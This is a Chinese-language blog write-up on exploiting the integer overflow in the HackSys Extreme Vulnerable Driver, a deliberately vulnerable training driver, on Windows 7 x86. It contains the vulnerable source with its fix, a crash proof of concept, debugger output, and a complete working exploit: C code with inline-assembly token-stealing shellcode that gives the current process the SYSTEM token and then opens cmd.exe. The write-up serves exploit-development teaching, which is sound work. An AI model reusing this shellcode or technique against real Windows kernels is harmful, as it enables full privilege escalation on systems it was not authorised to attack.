漏洞分析丨HEVD-0x8.IntegerOverflow[win7x86]

作者:selph
前言
窺探Ring0漏洞世界:整型溢出漏洞
本例中,整型溢出的問題出現在安全檢驗的地方,由于整型溢出導致錯誤的輸入通過了安全檢驗,從而造成了棧溢出漏洞
所謂整型溢出,有兩種,上溢出和下溢出,一個整型能表示的范圍是有限的,當超出范圍,就會發生溢出,例如0xffffffff+4 = 3,0-4=0xfffffffc
整型溢出漏洞是由于對用戶輸入的不安全處理而導致不安全的數據通過安全檢驗從而導致其他漏洞。
實(shí)驗(yàn)環(huán)境:
?虛擬機:Windows 7 x86
?物理機:Windows 10 x64
?軟件:IDA,Windbg,VS2022
漏洞分析
該漏洞的觸發函數TriggerIntegerOverflow,操作碼是:0x222027:
首先一開始就是一個初始化局部緩沖區(qū)的操作:

然后緊接著對用戶輸入的緩沖區進行了大小檢測,如果大于緩沖區大小則打印信息退出函數,如果小于等于則進入下面的while循環:不斷復制用戶緩沖區到內核緩沖區,每次復制4字節,直到復制的內容出現魔數或者用戶緩沖區長度復制完成為止

乍一看好像沒啥問題,但仔細(xì)觀察上面判斷用戶輸入Size那一塊代碼:if(Size + 4 > 0x800)
對于4字節整數,當出現溢出的時候:
0xfffffffc + 4 = 0
0xffffffff + 4 = 3
所以該處存在漏洞,有以下利用思路:通過給定Size參數一個超大的值,使得導致溢出,從而在后面while代碼塊進行復制的時候導致棧溢出,從而進行利用
接下來看看源碼:
/// <summary>
/// Trigger the Integer Overflow Vulnerability
/// </summary>
/// <param name="UserBuffer">The pointer to user mode buffer</param>
/// <param name="Size">Size of the user mode buffer</param>
/// <returns>NTSTATUS</returns>
__declspec(safebuffers)   // opts this function out of the /GS stack-cookie check, so an
                          // overrun of KernelBuffer reaches the saved return address unimpeded
NTSTATUS
TriggerIntegerOverflow(
    _In_ PVOID UserBuffer,
    _In_ ULONG Size
)
{
    ULONG Count = 0;                                   // index of the next ULONG slot written in KernelBuffer
    NTSTATUS Status = STATUS_SUCCESS;
    ULONG BufferTerminator = 0xBAD0B0B0;               // sentinel value that ends the copy loop early
    ULONG KernelBuffer[BUFFER_SIZE] = { 0 };           // fixed-size stack buffer; BUFFER_SIZE is defined elsewhere
    ULONG TerminatorSize = sizeof(BufferTerminator);   // 4 on x86
    PAGED_CODE();
    __try
    {
        //
        // Verify if the buffer resides in user mode
        //
        // NOTE(review): only sizeof(KernelBuffer) bytes are probed, not 'Size' bytes,
        // so this probe does not bound the copy loop below.
        //
        ProbeForRead(UserBuffer, sizeof(KernelBuffer), (ULONG)__alignof(UCHAR));
        DbgPrint("[+] UserBuffer: 0x%p\n", UserBuffer);
        DbgPrint("[+] UserBuffer Size: 0x%X\n", Size);
        DbgPrint("[+] KernelBuffer: 0x%p\n", &KernelBuffer);
        DbgPrint("[+] KernelBuffer Size: 0x%zX\n", sizeof(KernelBuffer));
#ifdef SECURE
        //
        // Secure Note: This is secure because the developer is not doing any arithmetic
        // on the user supplied value. Instead, the developer is subtracting the size of
        // ULONG i.e. 4 on x86 from the size of KernelBuffer. Hence, integer overflow will
        // not occur and this check will not fail
        //
        if (Size > (sizeof(KernelBuffer) - TerminatorSize))
        {
            DbgPrint("[-] Invalid UserBuffer Size: 0x%X\n", Size);
            Status = STATUS_INVALID_BUFFER_SIZE;
            return Status;
        }
#else
        DbgPrint("[+] Triggering Integer Overflow (Arithmetic Overflow)\n");
        //
        // Vulnerability Note: This is a vanilla Integer Overflow vulnerability because if
        // 'Size' is 0xFFFFFFFF and we do an addition with size of ULONG i.e. 4 on x86, the
        // integer will wrap down and will finally cause this check to fail
        //
        // e.g. Size = 0xFFFFFFFF: Size + 4 wraps to 3, "3 > sizeof(KernelBuffer)" is false,
        // and the oversized Size reaches the copy loop unchanged.
        //
        if ((Size + TerminatorSize) > sizeof(KernelBuffer))
        {
            DbgPrint("[-] Invalid UserBuffer Size: 0x%X\n", Size);
            Status = STATUS_INVALID_BUFFER_SIZE;
            return Status;
        }
#endif
        //
        // Perform the copy operation
        //
        // The loop bound is derived from 'Size' itself (Size / 4 ULONGs, up to 0x3FFFFFFF),
        // not from sizeof(KernelBuffer). With a wrapped Size the writes continue past the
        // end of KernelBuffer until BufferTerminator is read from the user data.
        //
        while (Count < (Size / sizeof(ULONG)))
        {
            if (*(PULONG)UserBuffer != BufferTerminator)
            {
                KernelBuffer[Count] = *(PULONG)UserBuffer;   // unbounded stack write once Count >= BUFFER_SIZE
                UserBuffer = (PULONG)UserBuffer + 1;
                Count++;
            }
            else
            {
                break;   // terminator found: stop copying
            }
        }
    }
    __except (EXCEPTION_EXECUTE_HANDLER)
    {
        Status = GetExceptionCode();
        DbgPrint("[-] Exception Code: 0x%X\n", Status);
    }
    return Status;
}
該漏洞的修復很簡單,把判定條件從左邊變到右邊:if(Size > 0x800 - 4),這樣用戶輸入也就不會發生變化了
漏洞利用
利用思路:利用kali生成一個超長隨機數組作為用戶緩沖區輸入,傳入的Size給出一個會導致溢出的值,然后觸發棧溢出,確定溢出點,填入跳轉地址執行shellcode
首先第一步:生成超長字符串:
┌──(selph?kali)-[~/桌面]
└─$ ./pattern_create.rb -l 0x900????????????
Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj9Ak0Ak1Ak2Ak3Ak4Ak5Ak6Ak7Ak8Ak9Al0Al1Al2Al3Al4Al5Al6Al7Al8Al9Am0Am1Am2Am3Am4Am5Am6Am7Am8Am9An0An1An2An3An4An5An6An7An8An9Ao0Ao1Ao2Ao3Ao4Ao5Ao6Ao7Ao8Ao9Ap0Ap1Ap2Ap3Ap4Ap5Ap6Ap7Ap8Ap9Aq0Aq1Aq2Aq3Aq4Aq5Aq6Aq7Aq8Aq9Ar0Ar1Ar2Ar3Ar4Ar5Ar6Ar7Ar8Ar9As0As1As2As3As4As5As6As7As8As9At0At1At2At3At4At5At6At7At8At9Au0Au1Au2Au3Au4Au5Au6Au7Au8Au9AV0AV1AV2AV3AV4AV5AV6AV7AV8AV9Aw0Aw1Aw2Aw3Aw4Aw5Aw6Aw7Aw8Aw9Ax0Ax1Ax2Ax3Ax4Ax5Ax6Ax7Ax8Ax9Ay0Ay1Ay2Ay3Ay4Ay5Ay6Ay7Ay8Ay9Az0Az1Az2Az3Az4Az5Az6Az7Az8Az9Ba0Ba1Ba2Ba3Ba4Ba5Ba6Ba7Ba8Ba9Bb0Bb1Bb2Bb3Bb4Bb5Bb6Bb7Bb8Bb9Bc0Bc1Bc2Bc3Bc4Bc5Bc6Bc7Bc8Bc9Bd0Bd1Bd2Bd3Bd4Bd5Bd6Bd7Bd8Bd9Be0Be1Be2Be3Be4Be5Be6Be7Be8Be9Bf0Bf1Bf2Bf3Bf4Bf5Bf6Bf7Bf8Bf9Bg0Bg1Bg2Bg3Bg4Bg5Bg6Bg7Bg8Bg9Bh0Bh1Bh2Bh3Bh4Bh5Bh6Bh7Bh8Bh9Bi0Bi1Bi2Bi3Bi4Bi5Bi6Bi7Bi8Bi9Bj0Bj1Bj2Bj3Bj4Bj5Bj6Bj7Bj8Bj9Bk0Bk1Bk2Bk3Bk4Bk5Bk6Bk7Bk8Bk9Bl0Bl1Bl2Bl3Bl4Bl5Bl6Bl7Bl8Bl9Bm0Bm1Bm2Bm3Bm4Bm5Bm6Bm7Bm8Bm9Bn0Bn1Bn2Bn3Bn4Bn5Bn6Bn7Bn8Bn9Bo0Bo1Bo2Bo3Bo4Bo5Bo6Bo7Bo8Bo9Bp0Bp1Bp2Bp3Bp4Bp5Bp6Bp7Bp8Bp9Bq0Bq1Bq2Bq3Bq4Bq5Bq6Bq7Bq8Bq9Br0Br1Br2Br3Br4Br5Br6Br7Br8Br9Bs0Bs1Bs2Bs3Bs4Bs5Bs6Bs7Bs8Bs9Bt0Bt1Bt2Bt3Bt4Bt5Bt6Bt7Bt8Bt9Bu0Bu1Bu2Bu3Bu4Bu5Bu6Bu7Bu8Bu9Bv0Bv1Bv2Bv3Bv4Bv5Bv6Bv7Bv8Bv9Bw0Bw1Bw2Bw3Bw4Bw5Bw6Bw7Bw8Bw9Bx0Bx1Bx2Bx3Bx4Bx5Bx6Bx7Bx8Bx9By0By1By2By3By4By5By6By7By8By9Bz0Bz1Bz2Bz3Bz4Bz5Bz6Bz7Bz8Bz9Ca0Ca1Ca2Ca3Ca4Ca5Ca6Ca7Ca8Ca9Cb0Cb1Cb2Cb3Cb4Cb5Cb6Cb7Cb8Cb9Cc0Cc1Cc2Cc3Cc4Cc5Cc6Cc7Cc8Cc9Cd0Cd1Cd2Cd3Cd4Cd5Cd6Cd7Cd8Cd9Ce0Ce1Ce2Ce3Ce4Ce5Ce6Ce7Ce8Ce9Cf0Cf1Cf2Cf3Cf4Cf5Cf6Cf7Cf8Cf9Cg0Cg1Cg2Cg3Cg4Cg5Cg6Cg7Cg8Cg9Ch0Ch1Ch2Ch3Ch4Ch5Ch6Ch7Ch8Ch9Ci0Ci1Ci2Ci3Ci4Ci5Ci6Ci7Ci8Ci9Cj0Cj1Cj2Cj3Cj4Cj5Cj6Cj7Cj8Cj9Ck0Ck1Ck2Ck3Ck4Ck5Ck6Ck7Ck8Ck9Cl0Cl1Cl2Cl3Cl4Cl5Cl6Cl7Cl8Cl9Cm0Cm1Cm2Cm3Cm4Cm5Cm6Cm7Cm8Cm9Cn0Cn1Cn2Cn3Cn4Cn5Cn6Cn7Cn8Cn9Co0Co1Co2Co3Co4Co5Co
6Co7Co8Co9Cp0Cp1Cp2Cp3Cp4Cp5Cp6Cp7Cp8Cp9Cq0Cq1Cq2Cq3Cq4Cq5Cq6Cq7Cq8Cq9Cr0Cr1Cr2Cr3Cr4Cr5Cr6Cr7Cr8Cr9Cs0Cs1Cs2Cs3Cs4Cs5Cs6Cs7Cs8Cs9Ct0Ct1Ct2Ct3Ct4Ct5Ct6Ct7Ct8Ct9Cu0Cu1Cu2Cu3Cu4Cu5Cu6Cu7Cu8Cu9CV0CV1CV2CV3CV4CV5CV6CV7CV8CV9Cw0Cw1Cw2Cw3Cw4Cw5Cw6Cw7Cw8Cw9Cx0Cx1Cx2Cx3Cx4Cx5Cx6Cx7Cx8Cx9Cy0Cy1Cy2Cy3Cy4Cy5Cy6Cy7
測試代碼:
#include
#include
// 0x900-byte (2304-byte) cyclic pattern produced by pattern_create.rb -l 0x900 above. It holds
// only ASCII letters and digits, so no 4-byte word in it equals the driver's 0xBAD0B0B0
// terminator and the kernel copy loop is not stopped early.
const char* randomStr = "Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj9Ak0Ak1Ak2Ak3Ak4Ak5Ak6Ak7Ak8Ak9Al0Al1Al2Al3Al4Al5Al6Al7Al8Al9Am0Am1Am2Am3Am4Am5Am6Am7Am8Am9An0An1An2An3An4An5An6An7An8An9Ao0Ao1Ao2Ao3Ao4Ao5Ao6Ao7Ao8Ao9Ap0Ap1Ap2Ap3Ap4Ap5Ap6Ap7Ap8Ap9Aq0Aq1Aq2Aq3Aq4Aq5Aq6Aq7Aq8Aq9Ar0Ar1Ar2Ar3Ar4Ar5Ar6Ar7Ar8Ar9As0As1As2As3As4As5As6As7As8As9At0At1At2At3At4At5At6At7At8At9Au0Au1Au2Au3Au4Au5Au6Au7Au8Au9AV0AV1AV2AV3AV4AV5AV6AV7AV8AV9Aw0Aw1Aw2Aw3Aw4Aw5Aw6Aw7Aw8Aw9Ax0Ax1Ax2Ax3Ax4Ax5Ax6Ax7Ax8Ax9Ay0Ay1Ay2Ay3Ay4Ay5Ay6Ay7Ay8Ay9Az0Az1Az2Az3Az4Az5Az6Az7Az8Az9Ba0Ba1Ba2Ba3Ba4Ba5Ba6Ba7Ba8Ba9Bb0Bb1Bb2Bb3Bb4Bb5Bb6Bb7Bb8Bb9Bc0Bc1Bc2Bc3Bc4Bc5Bc6Bc7Bc8Bc9Bd0Bd1Bd2Bd3Bd4Bd5Bd6Bd7Bd8Bd9Be0Be1Be2Be3Be4Be5Be6Be7Be8Be9Bf0Bf1Bf2Bf3Bf4Bf5Bf6Bf7Bf8Bf9Bg0Bg1Bg2Bg3Bg4Bg5Bg6Bg7Bg8Bg9Bh0Bh1Bh2Bh3Bh4Bh5Bh6Bh7Bh8Bh9Bi0Bi1Bi2Bi3Bi4Bi5Bi6Bi7Bi8Bi9Bj0Bj1Bj2Bj3Bj4Bj5Bj6Bj7Bj8Bj9Bk0Bk1Bk2Bk3Bk4Bk5Bk6Bk7Bk8Bk9Bl0Bl1Bl2Bl3Bl4Bl5Bl6Bl7Bl8Bl9Bm0Bm1Bm2Bm3Bm4Bm5Bm6Bm7Bm8Bm9Bn0Bn1Bn2Bn3Bn4Bn5Bn6Bn7Bn8Bn9Bo0Bo1Bo2Bo3Bo4Bo5Bo6Bo7Bo8Bo9Bp0Bp1Bp2Bp3Bp4Bp5Bp6Bp7Bp8Bp9Bq0Bq1Bq2Bq3Bq4Bq5Bq6Bq7Bq8Bq9Br0Br1Br2Br3Br4Br5Br6Br7Br8Br9Bs0Bs1Bs2Bs3Bs4Bs5Bs6Bs7Bs8Bs9Bt0Bt1Bt2Bt3Bt4Bt5Bt6Bt7Bt8Bt9Bu0Bu1Bu2Bu3Bu4Bu5Bu6Bu7Bu8Bu9Bv0Bv1Bv2Bv3Bv4Bv5Bv6Bv7Bv8Bv9Bw0Bw1Bw2Bw3Bw4Bw5Bw6Bw7Bw8Bw9Bx0Bx1Bx2Bx3Bx4Bx5Bx6Bx7Bx8Bx9By0By1By2By3By4By5By6By7By8By9Bz0Bz1Bz2Bz3Bz4Bz5Bz6Bz7Bz8Bz9Ca0Ca1Ca2Ca3Ca4Ca5Ca6Ca7Ca8Ca9Cb0Cb1Cb2Cb3Cb4Cb5Cb6Cb7Cb8Cb9Cc0Cc1Cc2Cc3Cc4Cc5Cc6Cc7Cc8Cc9Cd0Cd1Cd2Cd3Cd4Cd5Cd6Cd7Cd8Cd9Ce0Ce1Ce2Ce3Ce4Ce5Ce6Ce7Ce8Ce9Cf0Cf1Cf2Cf3Cf4Cf5Cf6Cf7Cf8Cf9Cg0Cg1Cg2Cg3Cg4Cg5Cg6Cg7Cg8Cg9Ch0Ch1Ch2Ch3Ch4Ch5Ch6Ch7Ch8Ch9Ci0Ci1Ci2Ci3Ci4Ci5Ci6Ci7Ci8Ci9Cj0Cj1Cj2Cj3Cj4Cj5Cj6Cj7Cj8Cj9Ck0Ck1Ck2Ck3Ck4Ck5Ck6Ck7Ck8Ck9Cl0Cl1Cl2Cl3Cl4Cl5Cl6Cl7Cl8Cl9Cm0Cm1Cm2Cm3Cm4Cm5Cm6Cm7Cm8Cm9Cn0Cn1Cn2Cn3Cn4Cn5Cn6Cn7Cn8Cn9Co0Co1Co2Co3Co4Co5Co6Co7Co8Co9Cp0Cp1Cp2Cp3Cp4Cp5Cp6Cp7Cp8Cp9Cq0Cq1Cq2Cq3Cq4Cq5Cq6Cq7Cq8Cq9Cr0Cr1Cr2Cr3Cr4Cr5Cr6Cr7Cr8Cr9Cs0Cs1Cs2Cs3Cs4Cs5Cs6Cs7Cs8Cs9Ct0Ct1Ct2Ct3Ct4Ct5Ct6Ct7Ct8Ct9Cu0Cu1Cu2Cu3Cu4Cu5Cu6Cu7Cu8Cu9CV0CV1CV2CV3CV4CV5CV6CV7CV8CV9Cw0Cw1Cw2Cw3Cw4Cw5Cw6Cw7Cw8Cw9Cx0Cx1Cx2Cx3Cx4Cx5Cx6Cx7Cx8Cx9Cy0Cy1Cy2Cy3Cy4Cy5Cy6Cy7";
int main()
{
    // Crash PoC: 0xFFFFFFFF is the Size that makes "Size + 4" wrap to 3 in the driver's
    // check, so the oversized value passes and drives the kernel copy loop.
    ULONG UserBufferSize = 0xffffffff;
    HANDLE hDevice = ::CreateFileW(L"\\\\.\\HacksysExtremeVulnerableDriver", GENERIC_ALL, FILE_SHARE_WRITE, nullptr, OPEN_EXISTING, 0, nullptr);
    if (hDevice == INVALID_HANDLE_VALUE) {
        printf("[ERROR]Open Device Error\r\n");
        system("pause");
        exit(1);
    }
    else {
        printf("[INFO]Device Handle: 0x%X\n", hDevice);   // NOTE(review): HANDLE passed for %X; %p would match the argument type
    }
    ULONG WriteRet = 0;
    // IOCTL 0x222027 -> TriggerIntegerOverflow. The driver copies ULONGs from randomStr until it
    // sees 0xBAD0B0B0 (never present in the ASCII pattern), so it overruns the 0x800-byte
    // KernelBuffer; the expected outcome is the bugcheck shown below, not a clean return.
    // The return value of DeviceIoControl is not checked and hDevice is never closed.
    DeviceIoControl(hDevice, 0x222027, (LPVOID)randomStr, UserBufferSize, NULL, 0, &WriteRet, NULL);
    system("pause");
    system("cmd.exe");
    return 0;
}
預料之內的崩潰了,查看棧回溯:
kd> k
# ChildEBP RetAddr???
00 9bcd2d74 83ef4083???? nt!RtlpBreakWithStatusInstruction
01 9bcd2dc4 83ef4b81???? nt!KiBugCheckDebugBreak+0x1c
02 9bcd3188 83ea341b???? nt!KeBugCheck2+0x68b
03 9bcd3210 83e563d8???? nt!MmAccessFault+0x106
???
04 9bcd3210 8d9f5733 (T) nt!KiTrap0E+0xdc
???
05 9bcd3ad0 43367243 (T) HEVD!TriggerIntegerOverflow+0xd5 [C:\Users\selph\Desktop\HackSysExtremeVulnerableDriver-master\Driver\HEVD\Windows\IntegerOverflow.c @ 133]
WARNING: Frame IP not in any known module. Following frames may be wrong.
06 9bcd3adc 43307343???? 0x43367243
可以看到05號函數調用那里出現了WARNING,說是這個IP不是任何已知模塊,實際上這就是咱們剛剛溢出覆蓋返回地址的地方
拿出kali查看一下這個值43367243的位置:
┌──(selph?kali)-[~/桌面]
└─$ ./pattern_offset.rb -q 43367243 -l 0x9000
[*] Exact match at offset 2088
位于2088字節處,通過溢出這么多字節,可控返回地址,接下來可以編寫exp了
編寫exp:
注意:在覆蓋完返回地址之后,把那個魔數跟在后面用來結束復制,不然大量向后面復制會導致進入某個異常處理函數而不是走返回地址返回(藍屏了三次才發現問題所在....)
#include
#include
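// Windows 7 SP1 x86 Offsets
// These structure offsets are specific to this OS build; they are read by the inline
// assembly in TokenStealingPayloadWin7 below. (The pasted version had lost the space
// between KTHREAD_OFFSET and its value, which defined an empty macro under the wrong name.)
#define KTHREAD_OFFSET     0x124   // nt!_KPCR.PcrbData.CurrentThread
#define EPROCESS_OFFSET    0x050   // nt!_KTHREAD.ApcState.Process
#define PID_OFFSET         0x0B4   // nt!_EPROCESS.UniqueProcessId
#define FLINK_OFFSET       0x0B8   // nt!_EPROCESS.ActiveProcessLinks.Flink
#define TOKEN_OFFSET       0x0F8   // nt!_EPROCESS.Token
#define SYSTEM_PID         0x004   // SYSTEM Process PID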
VOID TokenStealingPayloadWin7() {
    // Importance of Kernel Recovery
    // This runs in kernel mode once the overwritten return address is used. The epilogue
    // below has to leave the stack exactly as TriggerIntegerOverflow's caller expects it,
    // otherwise the system bugchecks instead of returning to user mode.
    __asm {
        pushad                                  ; save all general-purpose registers
    ; get the current process's EPROCESS
        xor eax, eax
        mov eax, fs: [eax + KTHREAD_OFFSET]     ; _KPCR.PcrbData.CurrentThread
        mov eax, [eax + EPROCESS_OFFSET]        ; _KTHREAD.ApcState.Process
        mov ecx, eax                            ; ecx = current EPROCESS
    ; walk ActiveProcessLinks until the entry whose PID equals SYSTEM_PID
        mov edx, SYSTEM_PID
        SearchSystemPID:
        mov eax, [eax + FLINK_OFFSET]
        sub eax, FLINK_OFFSET                   ; back from the list entry to the containing EPROCESS
        cmp[eax + PID_OFFSET], edx
        jne SearchSystemPID
    ; token stealing: copy the SYSTEM token pointer into the current process
        mov edx, [eax + TOKEN_OFFSET]
        mov[ecx + TOKEN_OFFSET], edx
    ; restore the environment and return
        popad
        xor eax, eax                            ; presumably a STATUS_SUCCESS return value
        add esp, 12
        pop ebp
        ret 8                                   ; presumably pops TriggerIntegerOverflow's two 4-byte arguments
    }
}
int main()
{
    // Layout of the user buffer (x86, 4-byte ULONG):
    //   [0    .. 2087]   'A' filler up to the saved return address (offset 2088 from pattern_offset above)
    //   [2088 .. 2091]   address of TokenStealingPayloadWin7, replacing the return address
    //   [2092 .. 2095]   0xBAD0B0B0, the driver's terminator, which stops the copy loop here
    ULONG UserBufferSize = 2088+4+4;
    PVOID EopPayload = &TokenStealingPayloadWin7;
    HANDLE hDevice = ::CreateFileW(L"\\\\.\\HacksysExtremeVulnerableDriver", GENERIC_ALL, FILE_SHARE_WRITE, nullptr, OPEN_EXISTING, 0, nullptr);
    if (hDevice == INVALID_HANDLE_VALUE) {
        printf("[ERROR]Open Device Error\r\n");
        system("pause");
        exit(1);
    }
    else {
        printf("[INFO]Device Handle: 0x%X\n", hDevice);   // NOTE(review): HANDLE passed for %X; %p would match the argument type
    }
    PULONG UserBuffer = (PULONG)HeapAlloc(GetProcessHeap(), HEAP_ZERO_MEMORY, UserBufferSize);
    if (!UserBuffer) {
        printf("[ERROR]Allocate ERROR");
        system("pause");
        exit(1);
    }
    else {
        printf("[INFO]Allocated Memory: 0x%p\n", UserBuffer);
        printf("[INFO]Allocation Size: 0x%X\n", UserBufferSize);
    }
    RtlFillMemory(UserBuffer, UserBufferSize, 0x41);
    // The (ULONG) pointer casts below are only valid on the 32-bit target this PoC is written for.
    PVOID MemoryAddress = (PVOID)(((ULONG)UserBuffer + UserBufferSize) - sizeof(ULONG)*2);
    *(PULONG)MemoryAddress = (ULONG)EopPayload;
    // 0x0BAD0B0B0: BufferTerminator, placed right after the return address so the driver stops copying
    MemoryAddress = (PVOID)(((ULONG)UserBuffer + UserBufferSize) - sizeof(ULONG));
    *(PULONG)MemoryAddress = (ULONG)0x0BAD0B0B0;
    ULONG WriteRet = 0;
    // Size is sent as 0xFFFFFFFF rather than UserBufferSize so it wraps past the driver's check;
    // the terminator keeps the driver from reading beyond the 2096-byte allocation.
    // The return value of DeviceIoControl is not checked and hDevice is never closed.
    DeviceIoControl(hDevice, 0x222027, (LPVOID)UserBuffer, 0xffffffff, NULL, 0, &WriteRet, NULL);
    HeapFree(GetProcessHeap(), 0, (LPVOID)UserBuffer);
    UserBuffer = NULL;
    system("pause");
    system("cmd.exe");
    return 0;
}
截圖演示

參考資料
?[1] FuzzySecurity | Windows ExploitDev: Part 14 https://www.fuzzysecurity.com/tutorials/expDev/18.html
?[2] [原創]HEVD學習筆記之整數溢出漏洞-二進制漏洞-看雪論壇-安全社區|安全招聘|bbs.pediy.com https://bbs.pediy.com/thread-270192.htm
?[3] Jcc — Jump if Condition Is Met (felixcloutier.com) https://www.felixcloutier.com/x86/jcc
?[4]?整型溢出漏洞_ATFWUS的博客-CSDN博客_整形溢出漏洞https://blog.csdn.net/ATFWUS/article/details/104605336